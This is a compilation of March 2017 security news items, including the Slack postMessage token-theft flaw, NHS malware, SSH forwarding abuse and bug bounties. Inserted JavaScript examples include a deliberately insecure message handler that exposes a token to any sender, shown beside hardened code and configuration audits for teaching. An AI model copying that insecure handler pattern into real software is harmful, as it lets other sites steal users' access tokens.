In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.


A flaw in Slack app allowed hackers to take over a user account
6.3.2017 securityaffairs Exploit

A bug in the popular Slack application could be exploited by attackers to steal an access token and take over a user account.
A serious flaw in the popular work chat application Slack could be exploited to take over a user account.


The vulnerability was discovered by bug bounty hunter Frans Rosen, who demonstrated that it is possible to steal Slack access tokens and impersonate a user. The flaw resides in the way the Slack application exchanges data between browser windows.

“I was able to create a malicious page that would reconnect your Slack WebSocket to my own WebSocket to steal your private Slack token. Slack fixed the bug in 5 hours (on a Friday) and paid me $3,000 for it.” reads a blog post published by Rosen.

Slack relies on the postMessage API, which enables cross-origin communication safely only when the receiving page checks the origin of each message.

Normally, scripts running on different web pages can access each other only if the pages share the same protocol (i.e. both https), port number (443 is the default for https), and host (modulo Document.domain being set by both pages to the same value).

“Using window.addEventListener(‘message’, func) and window.postMessage() to pass messages is a really convenient way of performing Cross-Origin communication. However, the biggest pitfall (which we’ve covered multiple times before) is not checking the origin of the message.” explained Rosen.
Slack uses postMessage every time it opens a new window to enable a voice call.
The Slack implementation of postMessage did not validate the origin of the data exchanged between the separate windows.
“Not validating them was a clear indication to me that I could start do fun stuff, like accessing the functions using postMessage to this window from another window I controlled.” added Rosen.
Having discovered the flawed implementation, the researcher demonstrated how to exploit the bug to steal a user’s access token.

Basically, he exploited the fact that if a user has a browser window open and opens a new window by clicking on a link, the two windows can communicate with each other through postMessage.

At this point, Rosen created a malicious page that is able to hijack the Slack application.

Below is a video PoC of the hack in which the malicious webpage opens a Slack window that then forces the victim’s account to hand over the access token.
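The missing origin check is easiest to see beside a handler that has one. The block below is an added example, not Slack’s code and not Rosen’s proof of concept: a message handler that trusts every sender, next to a hardened one that exact-matches the origin, allow-lists the methods it exposes and keeps the token out of the message channel altogether. TRUSTED_ORIGIN, the window state, the token value and the method names are constructed for the demo; the event objects are shaped like a browser MessageEvent (origin, data, source) so the handlers can be driven without a browser.

```javascript
// Added example (not Slack's code, not Rosen's PoC): a postMessage handler
// that trusts every sender, beside one that validates the origin.
// TRUSTED_ORIGIN, the window state and the method names are constructed.

const TRUSTED_ORIGIN = "https://app.example.test"; // assumed: the only page allowed to drive this window

// Constructed stand-in for the state a call window might hold.
function makeWindowState() {
  return { token: "xoxs-CONSTRUCTED-SAMPLE-TOKEN", callState: "idle" };
}

// Methods reachable through the message channel. Putting the token in this
// table at all is the mistake the hardened version removes.
function rpcTable(state) {
  return {
    getToken: () => state.token,
    startCall: () => { state.callState = "ringing"; return "ok"; },
  };
}

// Vulnerable pattern, as in:
//   window.addEventListener("message", e => vulnerableHandler(state, e));
// Any page holding a reference to this window (for example the page that
// opened it) can post {method: "getToken"} and read the reply, whatever its origin.
function vulnerableHandler(state, event) {
  const method = event.data && event.data.method;
  const rpc = rpcTable(state);
  return Object.prototype.hasOwnProperty.call(rpc, method) ? rpc[method]() : undefined;
}

// Hardened pattern: exact-match the origin (no prefix or substring checks),
// allow-list the methods, and never expose the secret through this channel.
const ALLOWED_METHODS = new Set(["startCall"]);

function hardenedHandler(state, event) {
  if (event.origin !== TRUSTED_ORIGIN) return undefined;   // foreign sender: drop silently
  const method = event.data && event.data.method;
  if (!ALLOWED_METHODS.has(method)) return undefined;     // unknown method: ignore
  return rpcTable(state)[method]();
}

// Replies are addressed to the sender's origin, never to "*", so an answer
// cannot land in a window that merely relayed the request.
function safeReply(event, payload) {
  if (event.origin !== TRUSTED_ORIGIN || !event.source) return false;
  event.source.postMessage(payload, event.origin);
  return true;
}
```

The comparison is `===` against a full origin string: checking `origin.indexOf("example.test") !== -1` or `origin.startsWith(...)` would accept attacker-controlled hosts that merely contain the trusted name.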


Hackers who breached Barts NHS Trust exploited a zero-day vulnerability
5.3.2017 securityaffairs Vulnerability

In January, a cyber attack breached some systems at Barts NHS Trust and forced them offline. Hackers exploited a zero-day vulnerability.
In January, a cyber attack breached some systems at Barts NHS Trust and forced them offline.

Barts Health Trust runs the Royal London, St Bartholomew’s, Whipps Cross, Mile End and Newham hospitals.

The hackers used malicious code to bypass security measures and compromise internal systems.

Shortly after the attack, Barts NHS Trust issued an initial report confirming that its systems had been infected by ransomware, but further investigation allowed experts to discover that the attackers had exploited a zero-day vulnerability.

Barts NHS Trust took some systems offline as a precautionary measure and reported that patient data had not been affected by the attack.

Law enforcement and experts are still investigating the case, but the minutes of a recent board meeting disclosed some new information.

The malware infected all the sites run by the Barts Health Trust except Whipps Cross. The incident response worked correctly and the malware was promptly contained. The malware infected pathology systems, and internal personnel switched their operations to manual mode.

“An IT virus had affected the Trust’s networks during January 2017. It was confirmed that this had affected all sites, except Whipps Cross but that the response had been effective and the Trust had swiftly returned to business as usual.” reads the minutes. “The virus had affected pathology systems (requiring the temporary use of manual systems), but no other IT systems used to deliver clinical care. A serious incident investigation was under way and further details would be shared once this had concluded.”

According to Deputy Chief Executive Tim Peachey, the malware that hit the systems wasn’t ransomware, and no patient information systems had been compromised. He confirmed that the malware was able to bypass antivirus software because it had not been seen before and leveraged a zero-day exploit.

The software supplier of the infected application fixed the flaw and issued a security patch within 8 hours.

Unfortunately, the number of cyber attacks on hospitals continues to increase and ransomware is among the most dangerous threats to this critical infrastructure.

In November 2016, malware compromised the National Health Service (NHS) network; hundreds of scheduled operations, appointments and diagnostic procedures were cancelled.

The hospitals hit by the malware-based attack are all located in Lincolnshire, England. In response to the incident, the IT staff shut down all the systems within its shared IT network, aiming to “isolate and destroy” the malware.

Some patients, including major trauma patients, were diverted to neighbouring hospitals. The hospitals affected by the incident were the Diana Princess of Wales in Grimsby, Scunthorpe General, and Goole and District.

Who will be next?


Metasploit team released Metasploit Vulnerable Services Emulator
5.3.2017 securityaffairs Vulnerability

Rapid7 released the Metasploit Vulnerable Services Emulator, a new tool that can be used by IT experts to emulate vulnerable services.
What is the best way to protect a system? You need to think about the system from the attacker’s perspective. For this reason Metasploit now has a new tool that can be used to emulate vulnerable services, the Metasploit Vulnerable Services Emulator. The tool is open source and was designed to give users a vulnerable platform on which security experts can test the thousands of Metasploit modules available to the community.

“There’s one problem: it’s hard to use Metasploit without vulnerable services to play against.” wrote Jin Qian in a blog post. “We developed the Vulnerable Services Emulator to fill this gap. It is a framework that makes it easy to emulate the vulnerable services for penetration testing purposes”

In the past, Metasploit released two vulnerable OS images, Metasploitable2 and Metasploitable3, for this purpose, but their usefulness was limited because they exercised only a small subset of the thousands of Metasploit modules available to users.


The Metasploit Vulnerable Services Emulator is available on GitHub; it already emulates more than 100 vulnerable services, as Qian explained.

“Right now, it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through module exercises, users can learn details about security vulnerabilities and how to test them, and are encouraged to continue to learn and play with Metasploit’s capabilities,” said Qian.

The Metasploit Vulnerable Services Emulator works on Windows, Mac or Linux. It is very easy to install and use; the only prerequisite is a working Perl installation.

The developers who designed the tool used JSON to describe vulnerable services, a choice that makes the framework independent of any specific programming language.

“We know developers have very different preferences on programming languages, so instead of implementing the vulnerable services using a particular language, the framework describes vulnerable service interactions in JSON.” continues the post. “It’s not a programming language per se but it has enough logic for service emulation. The following is the description for the vulnerable printer service.”

Security experts can use the Metasploit Vulnerable Services Emulator to test their Metasploit modules or to get training on Metasploit.


Extortion ransomware increasingly targets Android, inspired by successful attacks on computers

5.3.2017 Novinky/Bezpečnost Viruses
Mobile devices running the Android operating system are an increasingly frequent target of attacks by extortion malware. Last year such attacks rose by 50 percent year on year, according to ESET.
Various malicious codes attacked Android more last year than in 2015, but the rise in ransomware cases was the most pronounced.

“Although we saw an overall increase of roughly 20 percent in malware detections on Android, ransomware attacks on this platform are growing much faster. ESET recorded the highest growth in the first half of 2016, but we would certainly not venture to say that this threat will subside any time soon,” says ESET Chief Technology Officer Juraj Malcho.

Ransomware is a type of malicious code that locks a device in various ways and demands a ransom from the victim to unlock it. Last year saw the highest number of attempts ever to infect Android devices in this way. ESET, which has this data thanks to its LiveGrid technology, presented its findings at the Mobile World Congress trade show in Barcelona.

It is a global threat, expert warns
The authors of lockscreens (malicious code that locks the display of a mobile device) and crypto-ransomware (malicious code that encrypts the contents of the device) used the past year to copy the distribution techniques used by malware families that attack computers.

But they also developed sophisticated methods that target technologies specific to the Android operating system. At the same time, cybercriminals focused on keeping a low profile by encrypting the malicious code or hiding it deeper inside infected applications.

During 2015 ESET observed that the interest of ransomware authors targeting Android shifted from Eastern Europe to the USA and focused on mobile phone users. Last year, however, it became clear that attackers are increasingly aiming at the Asian market as well. “We can certainly state that ransomware on Android has become a fully fledged global threat,” adds Juraj Malcho.


How secure are virtualization containers?

5.3.2017 SecurityWorld Security
As organizations begin to use virtualization containers to improve application delivery and agility, the security of this emerging technology is logically attracting much more attention.

Container vendors such as Docker, Red Hat and others are working hard to reassure the market and convince it that containers are secure. In August of last year, Docker introduced the Docker Content Trust feature as part of the Docker 1.8 release.

It uses cryptographic signing to secure the code and software versions running in the software infrastructures of Docker users. The intent is to protect Docker users from dangerous backdoors contained in shared application images and from other potential security threats.

Docker Content Trust focuses on the integrity of delivered Docker container content. Ultimately it comes down to cryptographically signing the Docker images being deployed, the same approach used in Linux kernel development and by many embedded-system developers and OEMs to ensure that only signed images can be executed (for example in the Samsung Knox code on the Android platform).

That, however, is only one aspect of container security. There is also the challenge of ensuring that the code making up the entire image is free of vulnerabilities. If organizations do not keep their software stacks and application portfolios free of known exploitable versions of open source code, such measures are only a partial solution.

Without open source hygiene, these tools only ensure that Docker images contain exactly the same bits the developers originally put there, including every vulnerability present in the open source components.

A more holistic approach

Open source technologies need to be selected in an informed way. Users and integrators of open source code should be careful and should take care of ongoing maintenance of the code. You have to know your code, because you cannot manage what you cannot see.

Visibility into the code inside containers is a critical element of container security, right alongside the security of the containers themselves. New vulnerabilities affecting older versions of open source components are being discovered all the time.

For this reason, knowing that no vulnerabilities are present at the time of the initial build and deployment is necessary, but far from sufficient.

Securing container content is comparable to any other matter of securing a software stack. The trick, however, lies in when and how to gain visibility inside the container during development and after deployment.

The security risk a container represents depends on the sensitivity of the data accessible through it and on where it is deployed, for example behind a firewall or in a location reachable from the internet.

Internet-facing websites and cloud applications are the primary targets of criminals and naturally represent the highest potential exposure. Their publicly accessible attack surface makes them the target of a range of attacks including cross-site scripting (XSS), SQL injection and denial of service (DoS).

Given the prevalence of open source and other components in cloud and web applications, open source hygiene brings significant benefit in addressing the vulnerabilities of those components.

Open source hygiene is essential

With the growth of open source software use across the enterprise and with today’s closely watched vulnerabilities raising alarms, open source hygiene has become an essential part of an effective application security strategy.

Just as personal hygiene involves neutralizing sources of infection, open source hygiene entails keeping software stacks and application portfolios free of known exploitable versions of open source code. It is as important for containers as for any other element of software stacks.

Vulnerabilities inevitably appear in all types of software, and open source is no exception. Detecting and remediating vulnerabilities in open source, as in the case of the highly severe Heartbleed and FREAK vulnerabilities, is increasingly regarded as a prerequisite for security and a key part of a strong application security strategy.

For many organizations, application security today is tied to container security more than ever before. The good news is that companies developing comprehensive open source security strategies now have innovative tools available to gain a certain head start.

These tools can catalogue all open source code in software portfolios, from entire platforms such as Linux, Android and Hadoop, through individual code components, and down in detail to the level of code snippets embedded in internally developed application code.

Used on demand or integrated into software development workflows, these scanning tools give companies important, actionable information without slowing development or lengthening time to market.

It is very important to develop robust procedures for establishing the following:

Exactly which open source software is part of the application or its deployment?
Where is this open source software located in the build trees and system architectures?
Does the code have any known security vulnerabilities?
Creating an accurate open source risk profile.
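The four points above are, in effect, one procedure: inventory the components, record where each sits, match them against known-vulnerable version ranges and roll the result up into a risk profile. The block below is an added example of that procedure and is not code from any vendor’s scanning tool. The inventory entries, advisory identifiers and most version numbers are constructed; only the openssl range is modelled on Heartbleed, which affected OpenSSL 1.0.1 up to and including 1.0.1f and was fixed in 1.0.1g. The version comparator is deliberately simple (dotted numbers with an optional letter suffix) and is not a full semver implementation.

```javascript
// Added example, not a vendor's scanner: component inventory versus a list
// of advisories, answering what is in the image, where it sits and whether
// it is known-vulnerable, then summarising the findings as a risk profile.

// Constructed inventory, of the kind produced by scanning image layers and
// build trees. "where" answers the second question in the list above.
const INVENTORY = [
  { name: "openssl", version: "1.0.1f", where: "images/api/usr/lib/libssl.so.1.0.0" },
  { name: "openssl", version: "1.0.2k", where: "images/web/usr/lib/libssl.so.1.0.0" },
  { name: "libjson-example", version: "2.3.0", where: "src/vendor/libjson-example" },
  { name: "libjson-example", version: "2.4.1", where: "images/api/opt/app/node_modules/libjson-example" },
];

// Constructed advisories; ids are placeholders. Ranges are half-open:
// [introduced, fixed). The openssl range mirrors Heartbleed's.
const ADVISORIES = [
  { id: "ADV-CONSTRUCTED-0001", component: "openssl", introduced: "1.0.1", fixed: "1.0.1g", severity: "high" },
  { id: "ADV-CONSTRUCTED-0002", component: "libjson-example", introduced: "2.0.0", fixed: "2.4.0", severity: "critical" },
];

// "1.0.1f" -> [1, 0, 1, "f"]. Numbers compare numerically, letter suffixes
// lexically, and a missing part sorts before a present one (1.0.1 < 1.0.1f),
// which matches OpenSSL's old letter-release scheme.
function versionParts(v) {
  return (v.match(/\d+|[a-z]+/gi) || []).map(p => (/^\d+$/.test(p) ? Number(p) : p.toLowerCase()));
}

function compareVersions(a, b) {
  const pa = versionParts(a), pb = versionParts(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    if (pa[i] === undefined) return -1;
    if (pb[i] === undefined) return 1;
    if (pa[i] === pb[i]) continue;
    if (typeof pa[i] === typeof pb[i]) return pa[i] < pb[i] ? -1 : 1;
    return typeof pa[i] === "number" ? 1 : -1; // a numeric part outranks a letter part
  }
  return 0;
}

function isAffected(version, advisory) {
  return compareVersions(version, advisory.introduced) >= 0 &&
         compareVersions(version, advisory.fixed) < 0;
}

// Every inventory entry against every advisory for the same component.
function findVulnerableComponents(inventory, advisories) {
  const findings = [];
  for (const item of inventory) {
    for (const adv of advisories) {
      if (adv.component === item.name && isAffected(item.version, adv)) {
        findings.push({ component: item.name, version: item.version, where: item.where,
                        advisory: adv.id, severity: adv.severity, fixedIn: adv.fixed });
      }
    }
  }
  return findings;
}

// Risk profile: counts per severity, findings listed most severe first.
const SEVERITY_ORDER = ["critical", "high", "medium", "low"];
function riskProfile(findings) {
  const counts = {};
  for (const f of findings) counts[f.severity] = (counts[f.severity] || 0) + 1;
  const sorted = [...findings].sort(
    (a, b) => SEVERITY_ORDER.indexOf(a.severity) - SEVERITY_ORDER.indexOf(b.severity));
  return { counts, findings: sorted };
}
```

Because the advisory list changes after deployment, the same check has to be re-run against the inventory of images already in production, which is the “necessary but far from sufficient” point the article makes about build-time scans.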

Will container adoption slow down?

Large enterprises today are implementing containers for their proven benefits: improved application scalability, fewer deployment errors, shorter time to market and simplified application management.

Just as organizations over the years have changed their view of open source and no longer see it as a curiosity but as a business necessity, containers appear to have reached a similar tipping point.


Rockstar Games Launches Public Bug Bounty Program

4.3.2017 securityweek Vulnerability

Rockstar Games this week launched a public bug bounty program through HackerOne, after running it in private mode for more than nine months.

On the program’s page, the company reveals that the minimum bounty for successful vulnerability submissions is $150, but that researchers can get higher rewards, depending on the severity and complexity of the identified potential vulnerability. However, the company notes that higher bounties may be paid out at its own discretion.

For the time being, researchers are required to look for vulnerabilities only in a specific set of domains operated by the company.

“No authorization is given to test any other web applications, video game titles or mobile applications. No bounties will be given for any disclosures relating to any applications outside the scope of this program,” the company specifies.

At the same time, researchers are encouraged to hunt for bugs in support.rockstargames.com, because the portal runs on top of the Zendesk platform and Zendesk also participates in the HackerOne bounty program.

Interested researchers should head to the bug bounty program’s page and go through all of the recommendations and guidelines that the company published there, as submissions that don’t follow those requirements may not qualify for a bounty.

Valid submissions, Rockstar Games says, should include details on the type of issue being reported, the kind of attack, whether it fits a CWE (Common Weakness Enumeration) number, details on the steps necessary to reproduce the issue (issues that can’t be reliably reproduced can’t be fixed, the company notes), info on potential impact of the bug, and details on how a malicious user could potentially benefit from the issue.

“The privacy, security and experience of our users are of the utmost importance. Under no circumstances may any testing target or negatively affect our users. You must use only accounts you own and/or created specifically for testing purposes,” the company also notes.

To ensure their submissions qualify for a bounty, the researchers should be the first to submit a vulnerability and avoid publicly disclosing or discussing the vulnerability before or after submitting it. The company also published a list of bugs that are excluded from the program, yet it didn’t say what type of flaws are accepted, most probably because all other types of security issues are.

Rockstar’s bug bounty program has been running in private mode for the past nine months, which allowed the company to resolve “readily identifiable types of vulnerabilities found across their network,” HackerOne says. With over 150 vulnerabilities identified and closed and more than $85,000 in bounties paid, the program is considered a “huge success.”


Scientists Store an Operating System, a Movie and a Computer Virus on DNA
4.3.2017 thehackernews Virus

Do you know — 1 Gram of DNA Can Store 1,000,000,000 Terabyte of Data for 1000+ Years.
Just last year, Microsoft purchased 10 Million strands of synthetic DNA from San Francisco DNA synthesis startup called Twist Bioscience and collaborated with researchers from the University of Washington to focus on using DNA as a data storage medium.
However, in the latest experiments, a pair of researchers from Columbia University and the New York Genome Center (NYGC) have come up with a new technique to store massive amounts of data on DNA, and the results are marvelous.
The duo successfully stored 214 petabytes of data per gram of DNA, encoding a total number of six files, which include:
A full computer operating system
An 1895 French movie "Arrival of a Train at La Ciotat"
A $50 Amazon gift card
A computer virus
A Pioneer plaque
A 1948 study by information theorist Claude Shannon
The new research, which comes courtesy of Yaniv Erlich and Dina Zielinski, has been published in the journal Science.
But How Did the Researchers Store Digital Data on DNA?

Calling their process a "DNA Fountain," the researchers first compressed all the data into a single master archive and split it into short strings of binary digits, made up of ones and zeros.
Next, the duo used an “erasure-correcting algorithm called fountain codes” to randomly package the strings into droplets. Each droplet contains a barcode in the sequence that helped the researchers reassemble the file.
The researchers then "mapped the ones and zeros in each droplet to the four nucleotide bases in DNA: A, G, C and T," and ended up with a digital list of 72,000 DNA strands that contained the encoded data.
This code was then sent in a text file to Twist Biosciences, the same DNA synthesis startup from which Microsoft purchased 10 Million strands of synthetic DNA last year, that then turned that digital information into biological DNA.
"Two weeks later, they received a vial holding a speck of DNA molecules. To retrieve their files, they used modern sequencing technology to read the DNA strands, followed by software to translate the genetic code back into binary. They recovered their files with zero errors," the journal reads.
'Highest-Density Data-Storage Device Ever Created'
The researchers believe that DNA is the perfect storage medium – it is ultra-compact and can last hundreds of thousands of years if kept cool and dry – and suggest this is the “highest-density data-storage device ever created.”
The digital universe is large: by 2020 it will contain nearly as many digital bits as there are stars in the universe, reaching 44 zettabytes, or 44 trillion gigabytes.
So DNA data storage could help big organizations store an enormous amount of information in a way that can still be read a hundred years from now.
However, cost is still an issue. The researchers spent around $7,000 to synthesize the 2MB of data and another $2,000 to read that data.
That will change with time, but do not expect this technique to go mainstream anytime soon.
For more details on the technology, you can check this link out and the video given above.


The US Vice President Mike Pence’s personal AOL account was hacked
4.3.2017 securityaffairs Hacking

The US Vice President Mike Pence’s personal AOL account was hacked; once again, politicians were breached due to a poor security posture.
Pence has been harshly criticized after the discovery that he used his personal AOL account for Government issues.

In 2016 an attacker who compromised Pence’s account sent out emails to his contacts saying he had been mugged in the Philippines and needed money, a classic scam scheme.

The emails sent from Pence’s personal AOL account were obtained by the Indianapolis Star under a Freedom of Information Act request.

“Vice President Mike Pence reportedly used a private email account to conduct public business, including homeland security matters, while he was governor of Indiana. Records of the emails were obtained by IndyStar through a public records request.” reads the article published by the Indystar.

“Emails released to IndyStar in response to a public records request show Pence communicated via his personal AOL account with top advisers on topics ranging from security gates at the governor’s residence to the state’s response to terror attacks across the globe. In one email, “

Republican U.S. presidential candidate Donald Trump (R) points to Indiana Governor Mike Pence (L) before addressing the crowd during a campaign stop at the Grand Park Events Center in Westfield, Indiana, July 12, 2016. REUTERS/John Sommers II

The office of Indiana Gov. Eric Holcomb provided the media outlet with a 29-page document containing Pence’s email messages.

The emails include sensitive communications between Pence, while he was serving as Indiana governor, and members of his staff. The messages concern terrorist arrests, terror attacks in Canada, and much more.

“Similar to previous governors, during his time as Governor of Indiana, Mike Pence maintained a state email account and a personal email account.” replied a spokesman for Pence working at the office in Washington. “As Governor, Mr. Pence fully complied with Indiana law regarding email use and retention. Government emails involving his state and personal accounts are being archived by the state consistent with Indiana law, and are being managed according to Indiana’s Access to Public Records Act.”

The embarrassing aspect of the story is that during the US Presidential election campaign Pence attacked Hillary Clinton for misusing a private email server for work while Secretary of State.

Mike Pence (@mike_pence), 29 Oct 2016: “.@realDonaldTrump and I commend the FBI for reopening an investigation into Clinton's personal email server because no one is above the law.”
Fortunately for the US Vice President, Pence’s account did not handle classified material while he was governor, and US law allowed him this promiscuous use of his personal email.

Anyway, some of the emails in Pence’s account weren’t disclosed because “the state considers them confidential and too sensitive to release to the public.”


Exclusive: A criminal group using SSH TCP direct forward attack is also targeting Italian infrastructure
4.3.2017 securityaffairs Attack

Exclusive: MalwareMustDie, for Security Affairs, released the list of the sites under attack. A criminal gang is using the SSH TCP direct forward attack technique.
MalwareMustDie is back and has published its first post of 2017. The popular malware researcher has uncovered a cybercrime gang that is harvesting credentials and credit card numbers from major websites all around the world.

MMD has published a detailed analysis of the harvesting technique used by cyber criminals.

“A legitimate user who has authentication privileges on an existing SSH connection can forward the TCP protocol in a proxying mechanism. In a nutshell, it’s almost a common practice nowadays, especially for services that are meant to be viewed from a local network area.” wrote MMD.

“This threat’s definition is: the abuse of SSH TCP forwarding’s legitimate usage, by performing automatic or manual attacks on weak SSH accounts of remote devices (either servers or IoT), brute-forcing the accounts’ credentials or passwords, to perform a malicious set of TCP attacks via the TCP Direct Forward technique of the SSH forwarding functionality, utilizing this “force-accessed” SSH connection against targeted remote services.”

Following the operations of the criminal organization, MalwareMustDie has identified a new attack model that is being used all around the world.

Figure 1: The scheme adopted by the new threat

But let’s take a look at the overall process and the modus operandi of the attackers.

“The attacker is grabbing credentials from the hackable targets from their infrastructure,” continues the MalwareMustDie blog. “They manually perform the attack or daemonize the SSH connectivity to be TCP forwarded through some layers of hackable SSH accounts to perform the attack. The infrastructure of compromised SSH services and IoT devices is used as a front-end cushion for the attack. They aimed for credentials, launched through several TCP attacks (HTTP/HTTPS or SMTP).”

Attackers are able to launch various forms of attacks, mostly aimed at HTTP with and without SSL.

The forms of attacks are:

Sending malformed HTTP requests to a targeted web server to exploit the service.
Sending invalid HTTP method requests for mod-ssl vulnerabilities with the same purpose as above.
Sending HTTP requests to force (brute) authentication on legitimate sites for user(s) and password(s).
Sending HTTP requests to compromised sites to allegedly confirm suspicious activities.
Sending SMTP requests to several email servers (hereafter called “MTA”).
The analysis published by MalwareMustDie includes several PoC codes; the researcher also shared reversed code and traffic analysis, along with mitigation measures.

MMD included screenshots of the most frequently seen abuses against major websites such as PayPal, LinkedIn, Facebook, Gmail, Royal Bank, AT&T, Playstation Store, Playstation Network, eBay, Ubisoft, Sony Entertainment Network, and many others.

According to MMD, the hackers harvested a huge quantity of email from major online email services, including Gmail, Yahoo, AOL, Microsoft (Live Mail & Hotmail), Mail.ru, Yandex, etc.


When the attackers steal credentials from a website, they then use them in brute force attacks on other services.

“we have a recycle-like process for ultimate credential harvesting directed by hackers.” reads MMD.

The hackers launched both automated and manual attacks, with different characteristics in the way connections were made and attack sessions performed.

“Some typical characteristics in its logged activities have suggested a human’s direct interaction during a session of attacks, supporting the fact that the connection used to conduct TCP forwarding was manually set.” wrote MMD.
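The abuse described above needs two things from a victim’s sshd: a password-guessable account and TCP forwarding left enabled for it. The block below is an added example, not taken from the MalwareMustDie report: a checker that parses an sshd_config, applies sshd’s documented defaults for directives that are absent (AllowTcpForwarding yes, PasswordAuthentication yes, MaxAuthTries 6, and PermitRootLogin prohibit-password since OpenSSH 7.0) and reports which of those settings still match what this campaign relies on. The weak and hardened configurations are constructed; directives inside Match blocks are deliberately skipped, which is a simplification a real audit would not make.

```javascript
// Added example, not from the MalwareMustDie report: audit an sshd_config
// for the settings the SSH forwarding abuse above depends on. Both
// configurations below are constructed.

const WEAK_SSHD_CONFIG = `
# constructed: a default-ish configuration
Port 22
PermitRootLogin yes
PasswordAuthentication yes
# AllowTcpForwarding is not set, so sshd's default (yes) applies
`;

const HARDENED_SSHD_CONFIG = `
# constructed: forwarding off, password guessing made unattractive
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowTcpForwarding no
MaxAuthTries 3
`;

// Global directives only. Everything after a "Match" line is conditional
// and is skipped here; a real audit must evaluate those blocks per user/host.
// sshd honours the first occurrence of a directive, so later duplicates are ignored.
function parseSshdConfig(text) {
  const global = {};
  let inMatch = false;
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#")) continue;
    const [key, ...rest] = line.split(/\s+/);
    const k = key.toLowerCase();
    if (k === "match") { inMatch = true; continue; }
    if (inMatch) continue;
    if (!(k in global)) global[k] = rest.join(" ");
  }
  return global;
}

// Policy rows: sshd's default when the key is absent, and the value we want.
const POLICY = [
  { key: "allowtcpforwarding", defaultValue: "yes", want: v => v === "no" || v === "local",
    reason: "remote TCP forwarding lets a compromised account proxy traffic at third parties" },
  { key: "passwordauthentication", defaultValue: "yes", want: v => v === "no",
    reason: "password logins are what the brute-force stage of this campaign needs" },
  { key: "permitrootlogin", defaultValue: "prohibit-password", want: v => v === "no",
    reason: "root should not be reachable over SSH at all" },
  { key: "maxauthtries", defaultValue: "6", want: v => Number(v) <= 3,
    reason: "fewer attempts per connection slows password guessing" },
];

// Returns one finding per policy row the configuration fails, noting whether
// the offending value was written explicitly or came from sshd's default.
function auditSshdConfig(text) {
  const cfg = parseSshdConfig(text);
  const findings = [];
  for (const rule of POLICY) {
    const present = rule.key in cfg;
    const value = present ? cfg[rule.key].toLowerCase() : rule.defaultValue;
    if (!rule.want(value)) {
      findings.push({ key: rule.key, value, source: present ? "explicit" : "default", reason: rule.reason });
    }
  }
  return findings;
}
```

The `source: "default"` field is the useful part: a config that never mentions AllowTcpForwarding looks harmless on a grep, yet sshd enables forwarding in that case, which is exactly the state the attackers look for.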

Exclusive – Italian websites under attack

MMD, with the support of the popular cyber security expert Odisseus, allowed me to prepare and share a list of the Italian websites targeted by the criminal gang.

We publish exclusively the list of targeted Italian websites; the overall number of targets is 140, and it includes many mail servers.

The complete and detailed list will be shared with Italian authorities to allow further investigations.

Among the victims there are:

Alma Mater Studiorum Universita di Bologna
Siae
Ansaldo S.p.A. WAN
Telecom Italia S.p.A.
Universita degli Studi di Milano
FAO Food and Agriculture Organization of the United Nations
Bankadati Servizi Informatici Soc. Cons. p. A.
Intesa Sanpaolo Group Services S.c.p.A.
Cedecra Informatica Bancaria SRL
DADAnet Italia
BANCA CARIGE S.p.A.
Italiaonline S.p.A.
Tiscali SpA
Fincantieri Cantieri Navali Italiani
Server Plan S.r.l.
Banca Popolare di Milano
Telecom Italia S.p.A.
FastWeb’s Main Location
It is very important that the Italian CERTs start working together to fight this kind of threat: there is no time to waste!

The report shared by MMD is full of interesting data, including geographical distribution of the victims (mostly in the US) and the overall list of targeted IP addresses, including the Italian ones.

Special Thanks to Odisseus who supported me in the analysis of the events.

Update March 4, 2016

Security Affairs and Odisseus alerted the “Team Digitale” of the Italian Government that confirmed it is already working on the case.


Google Increases Bug Bounty Payouts by 50% and Microsoft Just Doubles It!
4.3.2017 thehackernews Security

Well, there's some good news for hackers and bug bounty hunters!
Both tech giants Google and Microsoft have raised the value of the payouts they offer security researchers, white hat hackers and bug hunters who find high severity flaws in their products.
While Microsoft has just doubled its top reward from $15,000 to $30,000, Google has raised its high reward from $20,000 to $31,337, which is a 50 percent rise plus a bonus $1,337 or 'leet' award.
In the past few years, every major company, from Apple to P*rnHub and Netgear, has started a bug bounty program to encourage hackers and security researchers to find and responsibly report bugs in their services and get rewarded.
But with more and more bug hunters participating in bug bounty programs at every big tech company, common and easy-to-spot bugs are rarely left now, and those that remain hardly make any severe impact.
Sophisticated and remotely exploitable vulnerabilities are the thing now, and they take more time and effort than ever to discover.

So researchers needed an incentive to help companies find high-severity vulnerabilities that have become harder to identify.
Until now, Google offered $20,000 for remote code execution (RCE) flaws and $10,000 for an unrestricted file system or database access bugs. But these rewards have now been increased to $31,337 and $13,337, respectively.
For earning the top notch reward of $31,337 from the tech giant, you need to find command injections, sandbox escapes and deserialization flaws in highly sensitive apps, such as Google Search, Chrome Web Store, Accounts, Wallet, Inbox, Code Hosting, Google Play, App Engine, and Chromium Bug Tracker.
Types of vulnerabilities in the unrestricted file system or database access category that can earn you up to $13,337 if they affect highly sensitive services include unsandboxed XML eXternal Entity (XXE) and SQL injection bugs.
Since the launch of its bug bounty program in 2010, Google has paid out over $9 Million, including $3 Million awarded last year.
Microsoft has also increased its bug bounty payouts from $20,000 to $30,000 for vulnerabilities in its Outlook and Office services, including cross-site scripting (XSS), cross-site request forgery (CSRF), unauthorized cross-tenant data tampering or access (for multi-tenant services), insecure direct object references, injection, server-side code execution, and privilege escalation bugs.
Both the tech giants are trying their best to eliminate any lucrative vulnerability or backdoor into their software and products to avoid any hacking attempts and make them more secure.
Hackers will get the payout reward after submitting the vulnerabilities along with a valid working proof-of-concept.
So, what are you waiting for? Go and Grab them all!


High Severity Flaws Patched by Siemens, Schneider Electric

4.3.2017 securityweek  ICS

ICS-CERT informed organizations earlier this week that Siemens and Schneider Electric have each patched high severity vulnerabilities in their products.

Siemens has addressed a man-in-the-middle (MitM) flaw in two SINUMERIK automation products that are used worldwide in the energy, healthcare and transportation sectors.

The SINUMERIK Integrate integration tool and the SINUMERIK Operate human-machine interface (HMI) are affected by a remotely exploitable vulnerability that can allow an MitM attacker to capture and modify data in TLS sessions.

The vulnerability, tracked as CVE-2017-2685, only affects clients when HTTPS is used, Siemens said in its advisory. The vendor has released patches for each of the affected product versions.

